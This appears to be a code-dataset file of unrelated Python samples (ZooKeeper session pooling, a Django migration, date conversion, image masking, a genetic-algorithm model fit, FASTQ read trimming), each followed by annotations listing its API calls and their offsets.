'datetime.now', ([], {}), '()\n', (1749, 1751), False, 'from datetime import datetime\n'), ((1804, 1818), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1816, 1818), False, 'from datetime import datetime\n'), ((3104, 3137), 'mdx_gfm.GithubFlavoredMarkdownExtension', 'GithubFlavoredMarkdownExtension', ([], {}), '()\n', (3135, 3137), False, 'from mdx_gfm import GithubFlavoredMarkdownExtension\n')] |
# -*- coding: utf-8 -*-
import atexit
import contextlib
import logging
import time
from collections import deque
from kazoo.client import KazooClient
from app import load_app_config
from app.exc import GulDanException
logger = logging.getLogger(__name__)
class Session(object):
def __init__(self, conn, timeout):
self.conn = conn
self.timeout = timeout
self.created_at = time.time()
def should_close(self):
if not self.conn.connected:
return True
return self.created_at + self.timeout < time.time()
def start(self):
self.conn.start()
def close(self):
self.conn.stop()
self.conn.close()
class ZKManager(object):
def __init__(self, zk_config, initial_conns=3, max_conns=10, session_timeout=300):
self.zksessions = deque()
self.zk_config = zk_config
self.initial_conns = initial_conns
self.max_conns = max_conns
self.session_timeout = session_timeout
def create_zk_sessions(self):
for i in range(self.initial_conns):
self.add_session(self.zk_config)
def add_session(self, zk_config):
if len(self.zksessions) > self.max_conns:
return
conn = KazooClient(**zk_config)
session = Session(conn, self.session_timeout)
self.zksessions.append(session)
session.start()
def _acquire_session(self):
session = None
while self.zksessions:
session = self.zksessions.pop()
if session.should_close():
session.close()
self.add_session(self.zk_config)
logger.warning("zk conn time out ,create a new one")
session = None
else:
break
return session
def return_session(self, session):
self.zksessions.append(session)
@contextlib.contextmanager
def zk_session_ctx(self):
session = None
try:
session = self._acquire_session()
if not session:
raise GulDanException().with_code(500).with_message(u"不能连接到zookeeper")
yield session
finally:
self.return_session(session)
def is_path_existing(self, path):
with self.zk_session_ctx() as session:
if session.conn.exists(path):
return True
return False
def close_sessions(self):
for s in self.zksessions:
s.close()
app_config = load_app_config()
zk_manager = ZKManager(
app_config.ZK_CONN_CONFIG,
**app_config.ZK_MANAGER_CONFIG
)
atexit.register(zk_manager.close_sessions)
| [
"logging.getLogger",
"collections.deque",
"kazoo.client.KazooClient",
"app.load_app_config",
"app.exc.GulDanException",
"time.time",
"atexit.register"
] | [((230, 257), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (247, 257), False, 'import logging\n'), ((2503, 2520), 'app.load_app_config', 'load_app_config', ([], {}), '()\n', (2518, 2520), False, 'from app import load_app_config\n'), ((2615, 2657), 'atexit.register', 'atexit.register', (['zk_manager.close_sessions'], {}), '(zk_manager.close_sessions)\n', (2630, 2657), False, 'import atexit\n'), ((403, 414), 'time.time', 'time.time', ([], {}), '()\n', (412, 414), False, 'import time\n'), ((826, 833), 'collections.deque', 'deque', ([], {}), '()\n', (831, 833), False, 'from collections import deque\n'), ((1242, 1266), 'kazoo.client.KazooClient', 'KazooClient', ([], {}), '(**zk_config)\n', (1253, 1266), False, 'from kazoo.client import KazooClient\n'), ((553, 564), 'time.time', 'time.time', ([], {}), '()\n', (562, 564), False, 'import time\n'), ((2074, 2091), 'app.exc.GulDanException', 'GulDanException', ([], {}), '()\n', (2089, 2091), False, 'from app.exc import GulDanException\n')] |
# Generated by Django 4.0.3 on 2022-04-08 17:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0005_alter_profile_accuracy_and_more'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='accuracy',
field=models.FloatField(default=0),
),
migrations.AlterField(
model_name='profile',
name='average_solving_time',
field=models.FloatField(default=0),
),
]
| [
"django.db.models.FloatField"
] | [((353, 381), 'django.db.models.FloatField', 'models.FloatField', ([], {'default': '(0)'}), '(default=0)\n', (370, 381), False, 'from django.db import migrations, models\n'), ((518, 546), 'django.db.models.FloatField', 'models.FloatField', ([], {'default': '(0)'}), '(default=0)\n', (535, 546), False, 'from django.db import migrations, models\n')] |
"""
Utility class to convert time formats
"""
import re
from datetime import datetime
from pytz import timezone
from ros import DAY_FORMAT, STANDARD_TIMEZONE_STR
class IntuitiveDateConverter:
"""
Handle common date formats of this project and convert as needed.
"""
@staticmethod
def to_datetime(d: object) -> datetime:
"""
Take in common date formats of this project and convert to datetime
"""
if type(d) == datetime:
return d
if type(d) == str:
if len(d) == 10:
if [i.start() for i in re.finditer('-', d)] == [4, 7]:
converted = datetime.strptime(d, DAY_FORMAT)
return converted
if type(d) in (float, int):
if d > 1e9:
if d > 1e12:
d /= 1000.0
converted = datetime.fromtimestamp(d).astimezone(timezone(STANDARD_TIMEZONE_STR))
return converted
raise ValueError(f'Intuitive date conversion not implement for this format/type. Passed input: {d}')
@staticmethod
def to_day_str(d: object) -> datetime:
"""
Take in common date formats of this project and convert to a day str of format '%Y-%m-%d'
"""
if type(d) == datetime:
return d.strftime(DAY_FORMAT)
if type(d) == str:
if len(d) == 10:
if [i.start() for i in re.finditer('-', d)] == [4, 7]:
return d
if type(d) in (float, int):
if d > 1e9:
if d > 1e12:
d /= 1000.0
converted = datetime.fromtimestamp(d).astimezone(timezone(STANDARD_TIMEZONE_STR)).strftime(DAY_FORMAT)
return converted
raise ValueError(f'Intuitive date conversion not implement for this format/type. Passed input: {d}')
@staticmethod
def to_epoch_s(d: object) -> datetime:
"""
Take in common date formats of this project and convert to an epoch (s)
"""
if type(d) == datetime:
return d.timestamp()
if type(d) == str:
if len(d) == 10:
if [i.start() for i in re.finditer('-', d)] == [4, 7]:
converted = datetime.strptime(d, DAY_FORMAT).timestamp()
return converted
if type(d) in (float, int):
if d > 1e9:
if d > 1e12:
d /= 1000.0
return d
raise ValueError(f'Intuitive date conversion not implement for this format/type. Passed input: {d}')
| [
"datetime.datetime.strptime",
"pytz.timezone",
"datetime.datetime.fromtimestamp",
"re.finditer"
] | [((661, 693), 'datetime.datetime.strptime', 'datetime.strptime', (['d', 'DAY_FORMAT'], {}), '(d, DAY_FORMAT)\n', (678, 693), False, 'from datetime import datetime\n'), ((919, 950), 'pytz.timezone', 'timezone', (['STANDARD_TIMEZONE_STR'], {}), '(STANDARD_TIMEZONE_STR)\n', (927, 950), False, 'from pytz import timezone\n'), ((882, 907), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', (['d'], {}), '(d)\n', (904, 907), False, 'from datetime import datetime\n'), ((596, 615), 're.finditer', 're.finditer', (['"""-"""', 'd'], {}), "('-', d)\n", (607, 615), False, 'import re\n'), ((1452, 1471), 're.finditer', 're.finditer', (['"""-"""', 'd'], {}), "('-', d)\n", (1463, 1471), False, 'import re\n'), ((1701, 1732), 'pytz.timezone', 'timezone', (['STANDARD_TIMEZONE_STR'], {}), '(STANDARD_TIMEZONE_STR)\n', (1709, 1732), False, 'from pytz import timezone\n'), ((2228, 2247), 're.finditer', 're.finditer', (['"""-"""', 'd'], {}), "('-', d)\n", (2239, 2247), False, 'import re\n'), ((2293, 2325), 'datetime.datetime.strptime', 'datetime.strptime', (['d', 'DAY_FORMAT'], {}), '(d, DAY_FORMAT)\n', (2310, 2325), False, 'from datetime import datetime\n'), ((1664, 1689), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', (['d'], {}), '(d)\n', (1686, 1689), False, 'from datetime import datetime\n')] |
import numpy as np
from .aux_funcs import stack_duplicate_frames, resolve_thresholdOnValue
from view.python_core.foto import get_foto1_data
class Mask(object):
def __init__(self, area_masker, threshold_masker):
super().__init__()
self.area_masker = area_masker
self.threshold_masker = threshold_masker
def get_mask_2D(self, data):
return self.area_masker.get_area_mask_2D() & self.threshold_masker.get_thresh_mask_2D(data)
def get_mask_3D(self, data):
return self.area_masker.get_area_mask_3D() & self.threshold_masker.get_thresh_mask_3D(data)
def get_mask(self, data):
if len(data.shape) == 2:
return self.get_mask_2D(data)
elif len(data.shape) == 3:
return self.get_mask_3D(data)
class AreaMaskBlank(object):
def __init__(self, movie_size):
super().__init__()
self.movie_size = movie_size
def get_area_mask_3D(self):
return np.ones(self.movie_size, dtype=bool)
def get_area_mask_2D(self):
return np.ones(self.movie_size[:2], dtype=bool)
class AreaMask(AreaMaskBlank):
def __init__(self, movie_size, frame_mask):
super().__init__(movie_size)
self.area_mask = frame_mask
def get_area_mask_3D(self):
return stack_duplicate_frames(self.area_mask, self.movie_size[2])
def get_area_mask_2D(self):
return self.area_mask
def apply_threshold(threshold_on, threshold_pos, threshold_neg):
threshold_pos = resolve_thresholdOnValue(threshold_on, threshold_pos)
threshold_neg = resolve_thresholdOnValue(threshold_on, threshold_neg)
return (threshold_on > threshold_pos) | (threshold_on < threshold_neg)
class ThresholdMaskBlank(object):
def __init__(self, data_size):
super().__init__()
self.data_size = data_size
def get_thresh_mask_2D(self, data):
return np.ones(self.data_size[:2], dtype=bool)
def get_thresh_mask_3D(self, data):
frame_mask = self.get_thresh_mask_2D(data)
return stack_duplicate_frames(frame_mask, self.data_size[2])
class ThresholdMaskStatic(ThresholdMaskBlank):
def __init__(self, threshold_on, threshold_pos, threshold_neg, data_size):
super().__init__(data_size)
self.thresh_mask = apply_threshold(threshold_on, threshold_pos, threshold_neg)
def get_thresh_mask_2D(self, data):
return self.thresh_mask
class ThresholdMaskDynamic(ThresholdMaskBlank):
def __init__(self, threshold_on, threshold_pos, threshold_neg, data_size):
super().__init__(data_size)
self.thresh_mask = apply_threshold(threshold_on, threshold_pos, threshold_neg)
def get_thresh_mask_2D(self, data):
raise AttributeError("ThresholdMaskDynamic object cannot generate a 2D mask, it should only be used "
"to threshold on 3D data")
def get_thresh_mask_3D(self, data):
return self.thresh_mask
class ThresholdMaskRunTime(ThresholdMaskBlank):
def __init__(self, threshold_pos, threshold_neg, data_size):
super().__init__(data_size)
self.threshold_pos = threshold_pos
self.threshold_neg = threshold_neg
def get_thresh_mask_2D(self, data):
return apply_threshold(data, threshold_pos=self.threshold_pos, threshold_neg=self.threshold_neg)
def get_thresh_mask_3D(self, data):
return apply_threshold(data, threshold_pos=self.threshold_pos, threshold_neg=self.threshold_neg)
def get_thresholder_3D(flags, p1, area_mask_excluded, excluder):
revised_movie_size = excluder.revise_movie_size((p1.metadata.format_x, p1.metadata.format_y, p1.metadata.frames))
if flags["mv_withinArea"]:
area_masker = AreaMask(movie_size=revised_movie_size, frame_mask=area_mask_excluded)
else:
area_masker = AreaMaskBlank(movie_size=revised_movie_size)
mv_thresholdPos = flags["mv_lowerThreshPositiveResps"]
mv_thresholdNeg = flags["mv_upperThreshNegativeResps"]
if flags["mv_thresholdOn"] in ("none", "None", "NONE"):
threshold_masker = ThresholdMaskBlank(data_size=revised_movie_size)
elif flags["mv_thresholdOn"] == "foto1":
foto1_data = get_foto1_data(flags, p1)
threshold_masker = ThresholdMaskStatic(data_size=revised_movie_size, threshold_on=foto1_data,
threshold_pos=mv_thresholdPos, threshold_neg=mv_thresholdNeg)
elif flags["mv_thresholdOn"] == "raw1":
threshold_masker = ThresholdMaskDynamic(data_size=revised_movie_size, threshold_on=p1.raw1,
threshold_pos=mv_thresholdPos, threshold_neg=mv_thresholdNeg)
elif flags["mv_thresholdOn"] == "sig1":
threshold_masker = ThresholdMaskDynamic(data_size=revised_movie_size, threshold_on=p1.sig1,
threshold_pos=mv_thresholdPos, threshold_neg=mv_thresholdNeg)
else:
raise NotImplementedError
return Mask(area_masker=area_masker, threshold_masker=threshold_masker)
def get_thresholder_2D(flags, p1, area_mask_excluded, excluder):
revised_movie_size = excluder.revise_frame_size((p1.metadata.format_x, p1.metadata.format_y))
if flags["SO_withinArea"]:
area_masker = AreaMask(movie_size=revised_movie_size, frame_mask=area_mask_excluded)
else:
area_masker = AreaMaskBlank(movie_size=revised_movie_size)
so_thresholdPos = flags["SO_lowerThreshPositiveResps"]
so_thresholdNeg = flags["SO_upperThreshNegativeResps"]
if flags["SO_thresholdOn"] in ("none", "None", "NONE"):
threshold_masker = ThresholdMaskBlank(data_size=revised_movie_size)
elif flags["SO_thresholdOn"] == "foto1":
foto1_data = get_foto1_data(flags, p1)
threshold_masker = ThresholdMaskStatic(data_size=revised_movie_size, threshold_on=foto1_data,
threshold_pos=so_thresholdPos, threshold_neg=so_thresholdNeg)
elif flags["SO_thresholdOn"] == "overview":
threshold_masker = ThresholdMaskRunTime(data_size=revised_movie_size, threshold_pos=so_thresholdPos,
threshold_neg=so_thresholdNeg)
else:
raise NotImplementedError(f"The value of the flag 'SO_thresholdOn' was set to {flags['SO_thresholdOn']}"
f", which is invalid. Valid values are 'foto1' and 'overview'. Look at the VIEW wiki "
f"for more information")
return Mask(area_masker=area_masker, threshold_masker=threshold_masker)
| [
"numpy.ones",
"view.python_core.foto.get_foto1_data"
] | [((969, 1005), 'numpy.ones', 'np.ones', (['self.movie_size'], {'dtype': 'bool'}), '(self.movie_size, dtype=bool)\n', (976, 1005), True, 'import numpy as np\n'), ((1055, 1095), 'numpy.ones', 'np.ones', (['self.movie_size[:2]'], {'dtype': 'bool'}), '(self.movie_size[:2], dtype=bool)\n', (1062, 1095), True, 'import numpy as np\n'), ((1904, 1943), 'numpy.ones', 'np.ones', (['self.data_size[:2]'], {'dtype': 'bool'}), '(self.data_size[:2], dtype=bool)\n', (1911, 1943), True, 'import numpy as np\n'), ((4211, 4236), 'view.python_core.foto.get_foto1_data', 'get_foto1_data', (['flags', 'p1'], {}), '(flags, p1)\n', (4225, 4236), False, 'from view.python_core.foto import get_foto1_data\n'), ((5768, 5793), 'view.python_core.foto.get_foto1_data', 'get_foto1_data', (['flags', 'p1'], {}), '(flags, p1)\n', (5782, 5793), False, 'from view.python_core.foto import get_foto1_data\n')] |
import numpy as np
import random
# experiment 4: static number of statements, coefficients, discrete genes, complex dynamical network
# sample results:
# -0.005886 + -0.998262 * xi^1.499023 + 1.007844 * sum Aij * xi^0.467529 * xj^0.521240
# -0.001100 + -0.999386 * xi^1.500244 + 0.997469 * sum Aij * xi^0.500488 * xj^0.501709
NUMBER_OF_NODES = 5
DELTA_T = 0.01
TIME_FRAMES = 100
CHROMOSOME_SIZE = 3
GENE_SIZE = 12 # bits
MUTATION_CHANCE = 0.1
POPULATION = 100
CHILDREN = 10
ITERATIONS = 10000
POWER_RANGE = (0, 5)
STEP = (POWER_RANGE[1] - POWER_RANGE[0]) / 2 ** GENE_SIZE
class Individual:
def __init__(self, chromosome, x, y, adjacency_matrix):
self.coefficients = None
self.chromosome = chromosome
self.fitness = self._calculate_fitness(x, y, adjacency_matrix)
def _get_theta(self, x, adjacency_matrix):
theta_list = []
for node_index in range(NUMBER_OF_NODES):
x_i = x[:TIME_FRAMES, node_index]
column_list = [
np.ones(TIME_FRAMES),
x_i ** self.powers[0],
]
terms = []
for j in range(NUMBER_OF_NODES):
if j != node_index and adjacency_matrix[j, node_index]:
x_j = x[:TIME_FRAMES, j]
terms.append(
adjacency_matrix[j, node_index] * x_i ** self.powers[1] * x_j ** self.powers[2])
if terms:
column = np.sum(terms, axis=0)
column_list.append(column)
theta = np.column_stack(column_list)
theta_list.append(theta)
return np.concatenate(theta_list)
def _calculate_mse(self, x, y, adjacency_matrix):
powers = []
for i in range(CHROMOSOME_SIZE):
binary = 0
for j in range(GENE_SIZE):
binary += self.chromosome[i * GENE_SIZE + j] * 2 ** (GENE_SIZE - j - 1)
power = POWER_RANGE[0] + binary * STEP
powers.append(power)
self.powers = powers
theta = self._get_theta(x, adjacency_matrix)
stacked_y = np.concatenate([y[:, node_index] for node_index in range(NUMBER_OF_NODES)])
coefficients = np.linalg.lstsq(theta, stacked_y, rcond=None)[0]
self.coefficients = coefficients
y_hat = np.matmul(theta, coefficients.T)
return np.mean((stacked_y - y_hat) ** 2)
def _calculate_least_difference(self):
sorted_powers = np.sort(self.powers)
return np.min(sorted_powers[1:] - sorted_powers[:-1])
def _calculate_fitness(self, x, y, adjacency_matrix):
mse = self._calculate_mse(x, y, adjacency_matrix)
least_difference = self._calculate_least_difference()
return least_difference / mse
class Population:
def __init__(self, size, x, y, adjacency_matrix):
self.size = size
self.x = x
self.y = y
self.adjacency_matrix = adjacency_matrix
self.individuals = self._initialize_individuals()
def _initialize_individuals(self):
individuals = []
for i in range(self.size):
individuals.append(Individual(
[random.randint(0, 1) for _ in range(CHROMOSOME_SIZE * GENE_SIZE)],
self.x,
self.y,
self.adjacency_matrix
))
return individuals
def _crossover(self, individual1, individual2):
crossover_point = random.randint(0, CHROMOSOME_SIZE * GENE_SIZE - 1)
offspring_chromosome = individual1.chromosome[:crossover_point] + individual2.chromosome[crossover_point:]
return Individual(offspring_chromosome, self.x, self.y, self.adjacency_matrix)
def _mutation(self, individual):
mutated_chromosome = []
for i in range(CHROMOSOME_SIZE * GENE_SIZE):
if random.random() < MUTATION_CHANCE:
mutated_chromosome.append(0 if individual.chromosome[i] else 1)
else:
mutated_chromosome.append(individual.chromosome[i])
return Individual(mutated_chromosome, self.x, self.y, self.adjacency_matrix)
@staticmethod
def _select_random_individual(sorted_individuals, total_fitness):
random_value = random.random()
selected_index = 0
selected_individual = sorted_individuals[0]
sum_fitness = selected_individual.fitness
for i in range(1, len(sorted_individuals)):
if sum_fitness / total_fitness > random_value:
break
selected_index = i
selected_individual = sorted_individuals[i]
sum_fitness += selected_individual.fitness
return selected_index, selected_individual
def run_single_iteration(self):
# the following two values are pre-calculated to increase performance
sorted_individuals = sorted(self.individuals, key=lambda individual: -1 * individual.fitness)
total_fitness = sum([individual.fitness for individual in self.individuals])
children = []
while len(children) < CHILDREN:
individual1_index, individual1 = self._select_random_individual(sorted_individuals, total_fitness)
individual2_index, individual2 = self._select_random_individual(sorted_individuals, total_fitness)
if individual1_index != individual2_index:
children.append(self._mutation(self._crossover(individual1, individual2)))
new_individuals = sorted(self.individuals + children, key=lambda individual: -1 * individual.fitness)
self.individuals = new_individuals[:self.size]
return self.individuals[0] # fittest
def _get_adjacency_matrix():
a = np.zeros((NUMBER_OF_NODES, NUMBER_OF_NODES))
for i in range(NUMBER_OF_NODES):
for j in range(NUMBER_OF_NODES):
if i != j:
a[i, j] = random.random()
return a
def _get_x(adjacency_matrix, time_frames):
x = np.zeros((time_frames + 1, NUMBER_OF_NODES))
x[0] = np.array(
[1 + random.random() * 10 for _ in range(NUMBER_OF_NODES)]
) # NOTE: values must be large enough and different
for i in range(1, time_frames + 1):
for j in range(NUMBER_OF_NODES):
f_result = -1 * (x[i - 1, j] ** 1.5)
g_result = 0
for k in range(NUMBER_OF_NODES):
if k != j:
g_result += adjacency_matrix[k, j] * (x[i - 1, j] ** 0.5) * (x[i - 1, k] ** 0.5)
derivative = f_result + g_result
x[i, j] = x[i - 1, j] + DELTA_T * derivative
return x
def _get_y(x):
x_dot = (x[1:] - x[:len(x) - 1]) / DELTA_T
return x_dot
def run():
adjacency_matrix = _get_adjacency_matrix()
x = _get_x(adjacency_matrix, TIME_FRAMES)
y = _get_y(x)
population = Population(POPULATION, x, y, adjacency_matrix)
fittest_individual = None
for i in range(ITERATIONS):
fittest_individual = population.run_single_iteration()
if i % 1000 == 0:
print(1 / fittest_individual.fitness)
print('%f + %f * xi^%f + %f * sum Aij * xi^%f * xj^%f' % (
fittest_individual.coefficients[0],
fittest_individual.coefficients[1],
fittest_individual.powers[0],
fittest_individual.coefficients[2],
fittest_individual.powers[1],
fittest_individual.powers[2]
))
if __name__ == '__main__':
run()
| [
"numpy.mean",
"numpy.ones",
"numpy.sort",
"numpy.column_stack",
"numpy.sum",
"numpy.zeros",
"numpy.matmul",
"numpy.concatenate",
"numpy.min",
"numpy.linalg.lstsq",
"random.random",
"random.randint"
] | [((5681, 5725), 'numpy.zeros', 'np.zeros', (['(NUMBER_OF_NODES, NUMBER_OF_NODES)'], {}), '((NUMBER_OF_NODES, NUMBER_OF_NODES))\n', (5689, 5725), True, 'import numpy as np\n'), ((5935, 5979), 'numpy.zeros', 'np.zeros', (['(time_frames + 1, NUMBER_OF_NODES)'], {}), '((time_frames + 1, NUMBER_OF_NODES))\n', (5943, 5979), True, 'import numpy as np\n'), ((1624, 1650), 'numpy.concatenate', 'np.concatenate', (['theta_list'], {}), '(theta_list)\n', (1638, 1650), True, 'import numpy as np\n'), ((2308, 2340), 'numpy.matmul', 'np.matmul', (['theta', 'coefficients.T'], {}), '(theta, coefficients.T)\n', (2317, 2340), True, 'import numpy as np\n'), ((2356, 2389), 'numpy.mean', 'np.mean', (['((stacked_y - y_hat) ** 2)'], {}), '((stacked_y - y_hat) ** 2)\n', (2363, 2389), True, 'import numpy as np\n'), ((2458, 2478), 'numpy.sort', 'np.sort', (['self.powers'], {}), '(self.powers)\n', (2465, 2478), True, 'import numpy as np\n'), ((2494, 2540), 'numpy.min', 'np.min', (['(sorted_powers[1:] - sorted_powers[:-1])'], {}), '(sorted_powers[1:] - sorted_powers[:-1])\n', (2500, 2540), True, 'import numpy as np\n'), ((3436, 3486), 'random.randint', 'random.randint', (['(0)', '(CHROMOSOME_SIZE * GENE_SIZE - 1)'], {}), '(0, CHROMOSOME_SIZE * GENE_SIZE - 1)\n', (3450, 3486), False, 'import random\n'), ((4225, 4240), 'random.random', 'random.random', ([], {}), '()\n', (4238, 4240), False, 'import random\n'), ((1543, 1571), 'numpy.column_stack', 'np.column_stack', (['column_list'], {}), '(column_list)\n', (1558, 1571), True, 'import numpy as np\n'), ((2202, 2247), 'numpy.linalg.lstsq', 'np.linalg.lstsq', (['theta', 'stacked_y'], {'rcond': 'None'}), '(theta, stacked_y, rcond=None)\n', (2217, 2247), True, 'import numpy as np\n'), ((1012, 1032), 'numpy.ones', 'np.ones', (['TIME_FRAMES'], {}), '(TIME_FRAMES)\n', (1019, 1032), True, 'import numpy as np\n'), ((1458, 1479), 'numpy.sum', 'np.sum', (['terms'], {'axis': '(0)'}), '(terms, axis=0)\n', (1464, 1479), True, 'import numpy as np\n'), ((3827, 3842), 'random.random', 'random.random', ([], {}), '()\n', (3840, 3842), False, 'import random\n'), ((5853, 5868), 'random.random', 'random.random', ([], {}), '()\n', (5866, 5868), False, 'import random\n'), ((6014, 6029), 'random.random', 'random.random', ([], {}), '()\n', (6027, 6029), False, 'import random\n'), ((3162, 3182), 'random.randint', 'random.randint', (['(0)', '(1)'], {}), '(0, 1)\n', (3176, 3182), False, 'import random\n')] |
def trim_paired_seqs(seq1, qual1, seq2, qual2, read_len):
''' Trim off Mirror-seq filled-in nucleoties. For read 1, trim off the last
three nucleotides if they are CGA. For read 2, trim off the first two nucleotides.
Parameters
----------
seq1 : str
The read 1 sequence.
qual1 : str
The quality scores of the read 1 sequence.
seq2 : str
The read 2 sequence.
qual2 : str
The quality scores of the read 2 sequence.
read_len : int
The orignal read length from sequencer.
Returns
-------
str
The trimmed read 1 sequence.
str
The tirmmed read 1 quality score.
str
The trimmed read 2 sequence.
str
The tirmmed read 2 quality score.
'''
if not seq1 or not qual1:
raise Exception('seq1 and qual1 are both required.')
if (seq2==None) ^ (qual2==None):
raise Exception('Cannot only has seq2 or qual2.')
if len(seq1)<=read_len and seq1.endswith('CGA'):
seq1 = seq1[:-3]
qual1 = qual1[:-3]
if seq2 and qual2:
seq2 = seq2[2:]
qual2 = qual2[2:]
return seq1, qual1, seq2, qual2
def filled_in_paired_end_trimming(read1_filename, read2_filename, out_read1_filename,
out_read2_filename, read_len):
''' Trim off filled-in nucleotides from read1 and read 2 files.
Parameters
----------
read1_filename : str
The read 1 filename in Fastq format with or without gzipped.
read2_filename : str
The read 2 filename in Fastq format with or without gzipped.
out_read1_filename : str
The read 1 output filename.
out_read2_filename : str
The read 2 output filename.
read_len : int
The orignal read length from sequencer.
'''
import pysam
import os
import gzip
import subprocess
fastq_file1 = pysam.FastxFile(read1_filename)
if out_read1_filename.endswith('.gz'):
fw1 = open(out_read1_filename[:-3], 'w')
else:
fw1 = open(out_read1_filename, 'w')
fastq_file2 = None
fw2 = None
if read2_filename:
fastq_file2 = pysam.FastxFile(read2_filename)
if out_read2_filename.endswith('.gz'):
fw2 = open(out_read2_filename[:-3], 'w')
else:
fw2 = open(out_read2_filename, 'w')
for i, read1 in enumerate(fastq_file1):
if i and i%1000000==0:
print('{} reads processed'.format(i))
if fastq_file2:
read2 = fastq_file2.next()
read2_sequence = read2.sequence
read2_quality = read2.quality
else:
read2 = None
read2_sequence = None
read2_quality = None
seq1, qual1, seq2, qual2 = trim_paired_seqs(read1.sequence, read1.quality,
read2_sequence, read2_quality, read_len)
read_name_str1 = ' '.join([read1.name, read1.comment])
fw1.write('@{}\n{}\n+\n{}\n'.format(read_name_str1, seq1, qual1))
if seq2:
read_name_str2 = ' '.join([read2.name, read2.comment])
fw2.write('@{}\n{}\n+\n{}\n'.format(read_name_str2, seq2, qual2))
fw1.close()
fastq_file1.close()
if fw2:
fw2.close()
fastq_file2.close()
if out_read1_filename.endswith('.gz'):
print('Gziping the files')
subprocess.check_call(('gzip', '-f', fw1.name))
if out_read2_filename:
subprocess.check_call(('gzip', '-f', fw2.name))
def run_trim_galore(read1_filename, read2_filename, out_dir, adapter1, adapter2):
''' Run Trim galore!
Parameters
----------
read1_filename : str
The read 1 filename in Fastq format with or without gzipped.
read2_filename : str
The read 2 filename in Fastq format with or without gzipped.
out_dir : str
The output directory.
adapter1 : str
The adapter of read 1.
adapter2 : str
The adapter of read 2.
'''
import subprocess
cmd = [
'trim_galore',
'-o', out_dir,
'-a', adapter1
]
if read2_filename:
if adapter2:
cmd += ['-a2', adapter2]
cmd += [
'--paired',
read1_filename,
read2_filename,
]
else:
cmd += [read1_filename]
subprocess.check_output(cmd)
def main(read1_filename, read2_filename, out_dir, no_adapter_trimming, read_len,
adapter1, adapter2):
''' Run the entire trimming.
read1_filename : str
The read 1 filename in Fastq format with or without gzipped.
read2_filename : str
The read 2 filename in Fastq format with or without gzipped.
out_dir : str
The output directory.
no_adapter_trimming : bool
If set, do not run Trim galore!.
read_len : int
The orignal read length from sequencer.
adapter1 : str
The adapter of read 1.
adapter2 : str
The adapter of read 2.
'''
import subprocess
import os
is_gzipped = read1_filename.endswith('.gz')
out_filename_template = os.path.join(out_dir, '{}_trimmed.fastq')
if is_gzipped:
prefix1 = os.path.splitext(os.path.splitext(read1_filename)[0])[0]
prefix2 = os.path.splitext(os.path.splitext(read2_filename)[0])[0]
out_filename_template += '.gz'
else:
prefix1 = os.path.splitext(read1_filename)[0]
prefix2 = os.path.splitext(read2_filename)[0]
prefix1 = os.path.basename(prefix1)
prefix2 = os.path.basename(prefix2)
out_read1_filename = out_filename_template.format(prefix1)
out_read2_filename = out_filename_template.format(prefix2)
# Trim_galore
if not no_adapter_trimming:
run_trim_galore(read1_filename, read2_filename, out_dir, adapter1, adapter2)
if is_gzipped:
read1_filename = os.path.join(out_dir,
'{}_val_1.fq.gz'.format(os.path.basename(
os.path.splitext(os.path.splitext(read1_filename)[0])[0]
)))
read2_filename = os.path.join(out_dir,
'{}_val_2.fq.gz'.format(os.path.basename(
os.path.splitext(os.path.splitext(read2_filename)[0])[0]
)))
else:
read1_filename = os.path.join(out_dir,
'{}_val_1.fq'.format(os.path.basename(os.path.splitext(read1_filename)[0])))
read2_filename = os.path.join(out_dir,
'{}_val_2.fq'.format(os.path.basename(os.path.splitext(read2_filename)[0])))
# Fill-in trimming.
filled_in_paired_end_trimming(read1_filename, read2_filename, out_read1_filename,
out_read2_filename, read_len)
print('done!')
def find_read_len(filename):
''' Use the first read to determine read length.
Parameters
----------
filename : str
The read Fastq filename.
Returns
-------
int
Read length.
'''
import os
import pysam
fastq_file = pysam.FastxFile(filename)
read = fastq_file.next()
fastq_file.close()
return len(read.sequence)
| [
"subprocess.check_output",
"pysam.FastxFile",
"subprocess.check_call",
"os.path.join",
"os.path.splitext",
"os.path.basename"
] | [((1875, 1906), 'pysam.FastxFile', 'pysam.FastxFile', (['read1_filename'], {}), '(read1_filename)\n', (1890, 1906), False, 'import pysam\n'), ((4307, 4335), 'subprocess.check_output', 'subprocess.check_output', (['cmd'], {}), '(cmd)\n', (4330, 4335), False, 'import subprocess\n'), ((5073, 5114), 'os.path.join', 'os.path.join', (['out_dir', '"""{}_trimmed.fastq"""'], {}), "(out_dir, '{}_trimmed.fastq')\n", (5085, 5114), False, 'import os\n'), ((5455, 5480), 'os.path.basename', 'os.path.basename', (['prefix1'], {}), '(prefix1)\n', (5471, 5480), False, 'import os\n'), ((5495, 5520), 'os.path.basename', 'os.path.basename', (['prefix2'], {}), '(prefix2)\n', (5511, 5520), False, 'import os\n'), ((6963, 6988), 'pysam.FastxFile', 'pysam.FastxFile', (['filename'], {}), '(filename)\n', (6978, 6988), False, 'import pysam\n'), ((2137, 2168), 'pysam.FastxFile', 'pysam.FastxFile', (['read2_filename'], {}), '(read2_filename)\n', (2152, 2168), False, 'import pysam\n'), ((3338, 3385), 'subprocess.check_call', 'subprocess.check_call', (["('gzip', '-f', fw1.name)"], {}), "(('gzip', '-f', fw1.name))\n", (3359, 3385), False, 'import subprocess\n'), ((3429, 3476), 'subprocess.check_call', 'subprocess.check_call', (["('gzip', '-f', fw2.name)"], {}), "(('gzip', '-f', fw2.name))\n", (3450, 3476), False, 'import subprocess\n'), ((5351, 5383), 'os.path.splitext', 'os.path.splitext', (['read1_filename'], {}), '(read1_filename)\n', (5367, 5383), False, 'import os\n'), ((5405, 5437), 'os.path.splitext', 'os.path.splitext', (['read2_filename'], {}), '(read2_filename)\n', (5421, 5437), False, 'import os\n'), ((5169, 5201), 'os.path.splitext', 'os.path.splitext', (['read1_filename'], {}), '(read1_filename)\n', (5185, 5201), False, 'import os\n'), ((5244, 5276), 'os.path.splitext', 'os.path.splitext', (['read2_filename'], {}), '(read2_filename)\n', (5260, 5276), False, 'import os\n'), ((6336, 6368), 'os.path.splitext', 'os.path.splitext', (['read1_filename'], {}), '(read1_filename)\n', (6352, 6368), False, 'import os\n'), ((6480, 6512), 'os.path.splitext', 'os.path.splitext', (['read2_filename'], {}), '(read2_filename)\n', (6496, 